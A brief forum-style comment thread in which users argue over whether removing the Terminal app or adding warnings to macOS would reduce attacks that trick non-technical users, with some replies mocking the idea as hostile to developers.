A solution would be to stop shipping Macs with the Terminal app. Computers are now used by a wide variety of people, some without technical knowledge; maybe a default switch on macOS that displays warnings on rather trivial attacks would help.
Well it's becoming developer hostile enough already. Maybe drop python and all command line tools while they're at it.
Would do wonders for that mythical year of the linux desktop...
How is that a solution? These attacks would just tell you to install terminal if you don't already have it.
That would help a little, no?